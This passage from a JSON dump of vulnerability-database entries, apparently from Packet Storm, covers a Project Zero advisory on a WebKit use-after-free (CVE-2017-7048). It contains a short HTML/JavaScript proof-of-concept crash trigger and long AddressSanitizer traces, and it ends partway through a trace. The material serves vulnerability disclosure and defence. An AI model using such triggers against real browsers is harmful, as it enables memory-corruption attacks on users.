fa \n0x1c1000012110: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 \n0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 \n0x1c1000012140: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa \n=>0x1c1000012150: fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd fd fd \n0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012170: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012180: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012190: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 \n0x1c10000121a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd \nShadow byte legend (one shadow byte represents 8 application bytes): \nAddressable: 00 \nPartially addressable: 01 02 03 04 05 06 07 \nHeap left redzone: fa \nFreed heap region: fd \nStack left redzone: f1 \nStack mid redzone: f2 \nStack right redzone: f3 \nStack after return: f5 \nStack use after scope: f8 \nGlobal redzone: f9 \nGlobal init order: f6 \nPoisoned by user: f7 \nContainer overflow: fc \nArray cookie: ac \nIntra object redzone: bb \nASan internal: fe \nLeft alloca redzone: ca \nRight alloca redzone: cb \n==30692==ABORTING \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. 
\n \n \n \n \nFound by: ifratric \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143488/GS20170725050805.txt"}, {"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit WebCore::AccessibilityNodeObject::textUnderElement Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7048"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143489", "href": "https://packetstormsecurity.com/files/143489/WebKit-WebCore-AccessibilityNodeObject-textUnderElement-Use-After-Free.html", "sourceData": "` WebKit: use-after-free in WebCore::AccessibilityNodeObject::textUnderElement \n \nCVE-2017-7048 \n \n \nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on an ASan build of WebKit nightly. \n \nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default. \n \nPoC: \n \n================================================================= \n \n<script> \nfunction go() { \nli.hidden = true; \ndir.setAttribute(\"aria-labeledby\", \"map\"); \n} \n</script> \n<body onload=go()> \n<dir id=\"dir\"> \n<li id=\"li\"> \n<map id=\"map\"> \n<area></area> \n \n================================================================= \n \nASan log: \n \n================================================================= \n==728==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000908a0 at pc 0x000109f2cbb5 bp 0x7fff5e08a430 sp 0x7fff5e08a428 \nREAD of size 8 at 0x6080000908a0 thread T0 \n==728==WARNING: invalid path to external symbolizer! \n==728==WARNING: Failed to use and restart external symbolizer! 
\n#0 0x109f2cbb4 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4) \n#1 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273) \n#2 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0) \n#3 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3) \n#4 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e) \n#5 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9) \n#6 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c) \n#7 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550) \n#8 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab) \n#9 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1) \n#10 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f) \n#11 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d) \n#12 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041) \n#13 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268) \n#14 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c) \n#15 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7) \n#16 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1) \n#17 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93) 
\n#18 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8) \n#19 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441) \n#20 0x279e6e001027 (<unknown module>) \n#21 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a) \n#22 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a) \n#23 0x115e2291a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a) \n#24 0x115a87757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757) \n#25 0x115a093da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da) \n#26 0x1150410f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1) \n#27 0x115041362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362) \n#28 0x1150416d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3) \n#29 0x10b0faa15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15) \n#30 0x10b48e510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510) \n#31 0x10a88f68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e) \n#32 0x10a88f170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170) \n#33 0x10a76a041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041) \n#34 0x10a779aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf) \n#35 0x10a67b7af in WebCore::Document::dispatchWindowLoadEvent() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af) \n#36 0x10a676103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103) \n#37 0x10aa1b9ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce) \n#38 0x10aa18d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c) \n#39 0x10a694493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493) \n#40 0x10ac085c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0) \n#41 0x10a733093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093) \n#42 0x10a6f2386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386) \n#43 0x10a181997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) \n#44 0x10a17b2aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) \n#45 0x10cb02c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) \n#46 0x10260c2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) \n#47 0x10260f689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) \n#48 0x10260eba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) \n#49 0x101eaf683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) \n#50 0x101c593b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5) \n#51 0x101c62888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888) \n#52 0x1164b5312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312) \n#53 0x1164b5d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41) \n#54 0x7fff8da4f3c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0) \n#55 0x7fff8da302cc in __CFRunLoopDoSources0 
(/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc) \n#56 0x7fff8da2f7c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5) \n#57 0x7fff8da2f1c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3) \n#58 0x7fff8cf90ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) \n#59 0x7fff8cf90cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) \n#60 0x7fff8cf90b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) \n#61 0x7fff8b52be23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23) \n#62 0x7fff8bca785d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d) \n#63 0x7fff8b5207aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa) \n#64 0x7fff8b4eb1dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd) \n#65 0x7fffa33eb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) \n#66 0x7fffa33ea2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) \n#67 0x101b7156c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) \n#68 0x7fffa3192234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) \n \n0x6080000908a0 is located 0 bytes inside of 88-byte region 
[0x6080000908a0,0x6080000908f8) \nfreed by thread T0 here: \n#0 0x104b54294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) \n#1 0x1164fcf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30) \n#2 0x10a0e1fda in WebCore::AXObjectCache::remove(unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dafda) \n#3 0x10a0e576e in WebCore::AXObjectCache::remove(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1de76e) \n#4 0x10c573c0b in WebCore::RenderObject::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266cc0b) \n#5 0x10c681ac3 in WebCore::RenderText::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x277aac3) \n#6 0x10c57412f in WebCore::RenderObject::destroy() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266d12f) \n#7 0x10c6d35ba in WebCore::RenderTreeUpdater::tearDownRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc5ba) \n#8 0x10c6d22a8 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb2a8) \n#9 0x10c6d11de in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca1de) \n#10 0x10c6d0c4d in 
WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d) \n#11 0x10c6d047b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b) \n#12 0x10a6757e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9) \n#13 0x10a670185 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x769185) \n#14 0x10a6767b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2) \n#15 0x10ccec7c6 in WebCore::TextIterator::TextIterator(WebCore::Range const*, unsigned short) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2de57c6) \n#16 0x10ccf8b2f in WebCore::plainText(WebCore::Range const*, unsigned short, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2df1b2f) \n#17 0x109f5820d in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5120d) \n#18 0x109f2c9e2 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x259e2) \n#19 0x109f58273 in 
WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273) \n#20 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0) \n#21 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3) \n#22 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e) \n#23 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9) \n#24 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c) \n#25 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550) \n#26 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab) \n#27 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1) \n#28 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f) \n#29 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d) \n \npreviously allocated by thread T0 here: \n#0 0x104b53d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) \n#1 0x7fffa3314281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) \n#2 0x116506ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4) \n#3 0x1164fbc4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d) \n#4 0x116491437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437) \n#5 0x116490768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768) \n#6 0x109f09a08 in WTF::RefCounted<WebCore::AccessibilityObject>::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a08) \n#7 0x109f55ef9 in WebCore::AccessibilityRenderObject::create(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4eef9) \n#8 0x10a0e3e5d in WebCore::createFromRenderer(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dce5d) \n#9 0x10a0e2c59 in 
WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbc59) \n#10 0x109f2c7c3 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x257c3) \n#11 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273) \n#12 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0) \n#13 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3) \n#14 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e) \n#15 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9) \n#16 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c) \n#17 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550) \n#18 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const 
